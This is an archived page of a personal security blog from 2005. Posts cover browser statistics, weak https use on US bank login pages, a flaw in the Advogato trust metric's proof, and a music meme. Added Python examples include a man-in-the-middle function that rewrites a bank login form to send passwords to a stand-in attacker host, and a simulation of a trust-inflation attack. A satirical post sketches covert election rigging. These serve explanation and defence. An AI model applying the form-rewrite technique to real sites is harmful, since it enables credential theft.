Searcher browser stats

May 28th, 2005

Even though the majority of visitors to squarefree.com use Gecko browsers, I can get a rough idea of general browser usage by looking at what browsers visitors are using when they find my site by searching for certain terms. Stats for some search terms that drove many users to my site between April 23 and May 27, sorted by percent Gecko:

Engine       Search phrase     Hits    IE   Gecko  KHTML  Opera  Other
Google       pornzilla         3491    6%   90%    2%     2%     0%
Google       burning edge       872   11%   82%    6%     2%     0%
Google       firefox nightly    649   11%   80%    6%     2%     1%
Google       bookmarklets      1219   22%   67%    4%     6%     0%
Google       dreamhost          196   24%   61%    10%    4%     0%
Google       jesse              357   55%   40%    3%     1%     0%
Yahoo        pornzilla          132   64%   36%    0%     0%     1%
Google       tontie             142   67%   30%    1%     2%     0%
Google       crashreport.wmv    154   73%   22%    4%     1%     0%
Yahoo video  terry tate         262   94%   5%     1%     0%     0%
MSN          tiava              242   98%   2%     0%     0%     0%
MSN          free porn        13412   97%   2%     0%     0%     0%

I did something similar last July.

Tools used: Analog to identify popular searches, search-uas.bat, make-search-ua-table.html, "View Selection Source" feature in Firefox, "sort table" bookmarklet.

Banks and https

May 28th, 2005

Here's what happens when you go to the web pages of some large US banks, and what happens when you try changing the homepage URL from "http" to "https" or vice versa.

Bank               http                                                     https
Bank One           Insecure login form.                                     Works.
Wells Fargo        Insecure login form.                                     Works.
Wachovia           Insecure login form.                                     Works.
Bank of America    Insecure login form.                                     Redirects to http.
Washington Mutual  Insecure login form.                                     Redirects to http.
US Bank            Insecure login form.                                     Error: Connection closed.
Citibank           Link to secure login form at "web.da-us.citibank.com".  Error: 404.
HSBC               Link to secure login form at "www.ebank.us.hsbc.com".   Certificate hostname mismatch.
Suntrust           Redirects to https.                                      Works.

Most of these banks make Critical SSL/TLS Mistake #1: the login form is served over http and only submits to https. This protects against passive attacks (an eavesdropper cannot read the password in transit), but it does not protect against man-in-the-middle attacks: nothing authenticates the http page, so an attacker on the path can rewrite the form's action to point at his own server, or to plain http, and the page looks exactly the same. An attacker who can mount a passive attack can usually mount a man-in-the-middle attack with only a little more work, so these banks are barely more secure than sites that do not use https at all.

Of the banks that use https login forms at all, many make two smaller mistakes: their main page is http, which invites http links and bookmarks, and their login forms have long hostnames like "web.da-us.citibank.com", which are harder for users to verify than e.g. "www.citibank.com" or "citibank.com".
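The two checks behind the table and the hostname complaint above can be automated. The following is an added example, not code from the original post: it finds every form containing a password field, classifies the page the way the table does (an http page whose form posts to https is the "Insecure login form" case), reports the hostnames the form submits to, and then shows what an active attacker can do to the unauthenticated http page. The sample page, its hostnames and the attacker host are constructed for the example and are not any bank's markup.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _LoginFormFinder(HTMLParser):
    """Collects the action attribute of every <form> that contains a password field."""

    def __init__(self):
        super().__init__()
        self.actions = []
        self._form = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._form = {"action": a.get("action") or "", "login": False}
        elif tag == "input" and self._form is not None and (a.get("type") or "").lower() == "password":
            self._form["login"] = True

    def handle_endtag(self, tag):
        if tag == "form" and self._form is not None:
            if self._form["login"]:
                self.actions.append(self._form["action"])
            self._form = None


def audit(page_url, html):
    """Classify a page the way the table above does.

    Returns {"verdict": ..., "hosts": [hosts the login form(s) submit to]}."""
    finder = _LoginFormFinder()
    finder.feed(html)
    targets = [urlsplit(urljoin(page_url, act)) for act in finder.actions]
    if not targets:
        return {"verdict": "no login form", "hosts": []}
    page_https = urlsplit(page_url).scheme == "https"
    form_https = all(t.scheme == "https" for t in targets)
    if page_https and form_https:
        verdict = "secure login form"
    elif form_https:
        # http page, https action: only an eavesdropper is kept out
        verdict = "insecure login form"
    else:
        verdict = "plaintext login form"
    return {"verdict": verdict, "hosts": sorted({t.hostname for t in targets})}


def mitm_rewrite(html, attacker_host):
    """What a man-in-the-middle does to an http login page: retarget the form.
    The lock image and the reassuring sentence are left alone, so the page looks identical."""
    return re.sub(r'action="https://[^"]*"', f'action="http://{attacker_host}/signin"', html)


# Constructed sample page (not any real bank's markup), served over http like most in the table.
SAMPLE_PAGE = """<html><body>
<img src="/images/lock.gif" alt="lock">
<p>The moment you click Sign In, we encrypt your ID and passcode using SSL.</p>
<form action="https://login.example-bank.test/signin" method="post">
  <input name="id"> <input type="password" name="passcode">
  <input type="submit" value="Sign In">
</form>
</body></html>"""

if __name__ == "__main__":
    print(audit("http://www.example-bank.test/", SAMPLE_PAGE))
    print(audit("https://www.example-bank.test/", SAMPLE_PAGE))
    print(audit("http://www.example-bank.test/", mitm_rewrite(SAMPLE_PAGE, "evil.test")))
```

Run against a saved copy of a homepage, the first call reproduces the table's verdict and lists the form hosts a user would have to verify; the third call shows that after the rewrite the lock image and the SSL sentence are still there while the password now goes to the attacker in the clear.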

Many of the largest targets for financial fraud in the US are only defending themselves against passive attacks. Do they believe authenticated encryption isn't important in the US? Aren't these the same banks that blackmailed Mozilla developers into adding two of Mozilla's most-hated features, "autocomplete=off" and "Cache-Control: no-store", claiming that any browser without these features was not secure enough for use on their sites? Banks in the US are heavily regulated, so why aren't they mandated to use https correctly?

Users either don't look for the lock icon at all, or can be tricked by the combination of a lock image and a statement in the page like "The moment you click Sign In and before your ID and passcode leave your computer, we encrypt them using Secure Sockets Layer (SSL) technology." Why is that? What can be done? What should be done?

The Advogato trust metric is not attack-resistant

May 26th, 2005

The project for the graduate algorithms class I took in Fall was to compare two algorithms for a problem of our choice. I chose to compare two trust metrics, the Advogato trust metric and Google's PageRank. Trust metrics attempt to solve the following problem: "Given a directed graph where an edge from A to B means 'A trusts B', whom should I trust?".

In the case of Advogato, the nodes are Advogato accounts and the edges are explicit certifications. In the case of Google, the nodes are web pages and the edges are links.

A good trust metric makes it difficult for an attacker to gain a large amount of trust. More specifically, we might want the amount of trust an attacker gains to be at most linear in the cost of the attack. It helps to think in terms of "bad" nodes, which are controlled by the attacker, "confused" nodes, which trust bad nodes, and "good" nodes, which are neither bad nor confused.

Proving a statement about the cost of an attack requires assuming something about the cost of compromising or confusing each node. Advogato assumes that the cost of confusing a node is closely related to the node's capacity, which is a function of the node's distance from the root. PageRank assumes that the cost of confusing a page is closely related to the page's popularity, which is in turn estimated by the page's PageRank score.

I discovered a problem with Advogato's security proof: it bounds the trust by the final capacities of the confused nodes rather than their capacities before the attack. An attacker can confuse a single expensive (high-capacity) node and many cheap (capacity 1) nodes, then tell the expensive node to trust the cheap nodes. Because capacity depends on distance from the root, the cheap nodes are now only one hop beyond the expensive node and their capacities jump. Now there are many confused nodes with substantial capacity, and the attacker can get an amount of trust equal to a constant times the square of the cost of the attack.

PageRank does not have this problem. The PageRank score gained by the attacker is bounded by a small constant times the total PageRank-score-before-attack of the confused pages, no matter where the attacker makes confused or bad nodes link.
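To make the capacity inflation concrete, here is an added simulation (not code from the original post, the class paper, or Advogato itself) of the Advogato metric on a small constructed certification graph. The flow-network construction follows the published Advogato metric: each node is split in two, a unit edge from its "in" half to a supersink represents accepting the node, an edge of capacity cap-1 carries the rest on to whoever it certifies, certification edges are unbounded, and a node is accepted if its unit edge is saturated in a maximum flow from the seed. The capacity table CAPS (much flatter than Advogato's real one), the graph, the node names and the number of attacker accounts are assumptions made for this illustration. E is the confused expensive node one hop from the seed; C1..C4 are the confused cheap nodes three hops out; each Ci already certifies seven attacker accounts. The run compares the attacker's gain before and after E is told to certify C1..C4.

```python
from collections import defaultdict, deque

# Capacity granted to a node by its certification distance from the seed (index = hops).
# Constructed values for this example; Advogato's real table is steeper (800, 200, 50, ...).
CAPS = [64, 16, 8, 2, 1]
INF = 10 ** 9


def capacity(hops):
    return CAPS[min(hops, len(CAPS) - 1)]


def distances(seed, certs):
    """Breadth-first hop count from the seed along certification edges."""
    dist = {seed: 0}
    queue = deque([seed])
    while queue:
        a = queue.popleft()
        for b in certs.get(a, ()):
            if b not in dist:
                dist[b] = dist[a] + 1
                queue.append(b)
    return dist


def max_flow(edges, source, sink):
    """Edmonds-Karp. edges: {u: {v: capacity}}. Returns the residual graph."""
    res = defaultdict(dict)
    for u, outs in edges.items():
        for v, c in outs.items():
            res[u][v] = res[u].get(v, 0) + c
            res[v].setdefault(u, 0)
    while True:
        parent = {source: None}
        queue = deque([source])
        while queue and sink not in parent:
            u = queue.popleft()
            for v, c in res[u].items():
                if c > 0 and v not in parent:
                    parent[v] = u
                    queue.append(v)
        if sink not in parent:
            return res
        path, v = [], sink
        while parent[v] is not None:
            path.append((parent[v], v))
            v = parent[v]
        bottleneck = min(res[u][v] for u, v in path)
        for u, v in path:
            res[u][v] -= bottleneck
            res[v][u] += bottleneck


def advogato(seed, certs):
    """Advogato trust metric: returns (accepted nodes, capacity of every reachable node)."""
    dist = distances(seed, certs)
    edges = defaultdict(dict)
    edges["source"][(seed, "in")] = capacity(0)
    for a, hops in dist.items():
        cap = capacity(hops)
        edges[(a, "in")]["sink"] = 1                 # one unit is spent accepting a itself
        if cap > 1:
            edges[(a, "in")][(a, "out")] = cap - 1   # the rest may flow on to whom a certifies
        for b in certs.get(a, ()):
            edges[(a, "out")][(b, "in")] = INF
    res = max_flow(edges, "source", "sink")
    accepted = {a for a in dist if res[(a, "in")]["sink"] == 0}
    return accepted, {a: capacity(h) for a, h in dist.items()}


def scenario(expensive_certifies_cheap):
    """Constructed graph: seed -> {G1, G2, E}; G1 -> {H1, H2}; G2 -> {H3, H4}; Hi -> Ci.
    E is the confused expensive node (1 hop); C1..C4 are the confused cheap nodes (3 hops),
    each already certifying seven attacker-controlled accounts."""
    certs = defaultdict(set)
    certs["seed"] = {"G1", "G2", "E"}
    certs["G1"] = {"H1", "H2"}
    certs["G2"] = {"H3", "H4"}
    cheap = ["C1", "C2", "C3", "C4"]
    bad = []
    for h, c in zip(["H1", "H2", "H3", "H4"], cheap):
        certs[h] = {c}
        certs[c] = {f"bad_{c}_{i}" for i in range(7)}
        bad.extend(sorted(certs[c]))
    if expensive_certifies_cheap:
        certs["E"] = set(cheap)      # the attack step: E now vouches for C1..C4
    return certs, ["E"] + cheap, bad


def trust_gained(expensive_certifies_cheap):
    """Returns (attacker accounts accepted, sum of the confused nodes' current capacities)."""
    certs, confused, bad = scenario(expensive_certifies_cheap)
    accepted, caps = advogato("seed", certs)
    return sum(1 for b in bad if b in accepted), sum(caps[c] for c in confused)


if __name__ == "__main__":
    print("before E certifies the cheap nodes:", trust_gained(False))
    print("after:", trust_gained(True))
```

Before the attack step, the cheap nodes have capacity 2 and pass one unit each, so 4 attacker accounts are accepted and the confused nodes' capacities sum to 24. After E certifies them, they sit two hops from the seed with capacity 8, and 28 attacker accounts are accepted: more than 24, the pre-attack capacity sum, though still under 48, the post-attack sum. That is exactly the gap in the proof: the bound holds only for the capacities the attacker has already inflated.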

For more details, you can read my paper for the algorithms class.

Bash.org Instant Voting user script

May 25th, 2005

Bash.org Instant Voting makes the vote links on bash.org submit your vote without taking you to another page. If the server accepts your vote, the script shows the item's new score, assuming nobody else has voted on the item since you loaded the page.

How to rig an election

May 24th, 2005

If I worked for Diebold and wanted to help Republicans win, I wouldn't do something easily detectable like changing 2% of votes to be for my candidate or making some machines break down at 5pm to give the working class a difficult time. Instead, I would work harder on usability for machines going to friendly districts.

With this scheme, blame for any election-tipping would mostly go to "user error" rather than poor design. Even better, the voters who committed the errors would mostly be Democrats, which would make Democrats look dumb once again.

Musical baton

May 24th, 2005

This meme escaped from LiveJournal into the standards-based web design world. Sander passed it to me and Tristor also tried to pass it to me. Sander's post got me hooked on "Tower" by Vienna Teng, which I had somehow missed last time I visited her site, so I feel obligated to spread the meme. Also, the voices in my head said that if I didn't pass it on, I would be ridiculed by LiveJournal users and would not find any good music for a whole month.

Total volume of music files on my computer

11.5 GB in 2567 MP3s, 67 OGGs, and 24 WMAs.

Last CD I bought

To Touch The Stars. This CD contains Garry Novikoff's "Dog on the Moon", which was good enough to get me onto Garry's mailing list.

Playing right now

Enya - "The Celts". My Audioscrobbler profile lists the songs I've been listening to the most.

Five songs that mean a lot to me

"Threes" by Mercedes Lackey, Julia Ecklar (women's version), and Bob Kanefsky (men's version). Helen knew the song from reading the Mercedes Lackey story from which it came, and I knew the song from listening to filk music. The song came up in a conversation in Emily's room, either by me mentioning filk or Helen mentioning Lackey. I invited Helen to my room to hear it and other filk songs. We hooked up several weeks later and stayed together for over a year. "Threes" are also my favorite varying-chorus songs, closely followed by "Ballad of the Shape of Things" and "Seven Drunken Nights in Space".

"Terra's Theme" from Final Fantasy 6. Several days into FF6, I heard this theme after coming out of a cave, and felt like I had known it for my entire life. Yes, I know that's something an RPG character would say. Maybe I had heard someone play a self-arranged piano version of the song (Ezekiel Chang from Ross?).

Vertical Horizon - "Everything You Want". I first heard it on the radio when I was in a car with Sara Saperstein. She had heard the song before and mentioned that she liked it a lot. Ever since then, I have associated this song with her.

Kathy Mar - "The Word of God". A beautiful attempt to reconcile Christianity with science.

Joan Baez - "Through Your Hands".

Five songs that can make me cry

This was one of the easier questions. It's hard to pick my favorite songs, because there are many songs I like, but there are only a dozen songs that have ever made me cry.

Julia Ecklar - "The Phoenix".

Julia Ecklar / Jordin Kare - "Pushing the Speed of Light". You have to know some physics to understand this song.

Alanis Morissette - "Your House". My favorite example of irony in an Alanis song.

Evanescence - "Bring Me to Life". Amy Lee's voice (at the beginning) makes me cry, not the lyrics. I learned about this song by attending a cappella concerts -- I heard three good a cappella versions of the song before I heard Evanescence's version.

Tish Hinojosa - "Donde Voy" is the only non-English song that makes me cry. I found this song soon after listening to the treasure map CD Voce, which contains Tish Hinojosa's "Las Golondrinas".

Five favorites that I've known for over a month

Blackmore's Night - "Beyond the Sunset"

Blackmore's Night - "Cartouche"

Claremont Shades - "Techno Fusion"

Inoj - "Time after Time"

The Corrs - "Breathless"

How I discover good music

  • Friends with similar tastes in music, including Jeri, Ishani, James, and Michelle.
  • My parents.
  • Treasure map CDs with songs by many artists, such as Voce and the Magnatune rock compilation.
  • Parodists such as Weird Al, The Capitol Steps, and Bob Kanefsky.
  • A cappella concerts and CDs. I have Helen to thank for introducing me to a cappella music, which is great both itself and as a way to learn about a wide variety of music.
  • Amazon recommendations. Audioscrobbler has the potential to unseat Amazon for this position in my life.
  • Radio.

Five people to whom I'm passing the baton

  • Matthew Thomas.
  • Grey Hodge, who jumped up and down in #bs begging me to pass the baton to him. Tristor already got him.
  • Adam Sacarny, the only person in my blogroll who has written much about music.
  • Michelle, who knows about a world of Christian music that I'm missing out on for the silly reason that I'm an atheist. She introduced me to Jack Johnson and was indirectly responsible for introducing me to both Jennifer Knapp (through Holly) and Avalon (by bringing me to a Christian concert).
  • Jeri, who has introduced me to many good artists. She does not have a blog and hereby must start one.
  • Ishani, who introduced me to Bryan Adams, Hoobastank, and Josh Groban. She does not have a blog and hereby must start one.

AutoLink filters

May 24th, 2005

If you've made new AutoLink filters, please post them in comments wrapped in <pre> or post them in your blog and use trackback. Feel free to request filters, too.

For tutorials and references on using regular expressions in JavaScript, see http://del.icio.us/jesser/regexp+javascript.

Tips for testing filters:

  • Use the Edit button in Greasemonkey 0.3.3+. As soon as you save your changes in your text editor, they will apply the next time you load or reload a page.
  • Create a test page similar to autolink-test.html. Then you can test each change by saving autolink.user.js in your text editor and reloading the test page.
  • Use Thomas Russell's regular expression tool or the JavaScript Environment to test your regular expressions.

Code in comments

May 23rd, 2005

I made some changes to my WordPress install to make it easier to post code in comments. You can now post code by enclosing it in <code> or <pre>. You still have to escape <, >, and & as &lt;, &gt;, and &amp;, but you no longer have to worry about wrapping, indentation, and smart quotes.

Making these changes was harder than I expected.
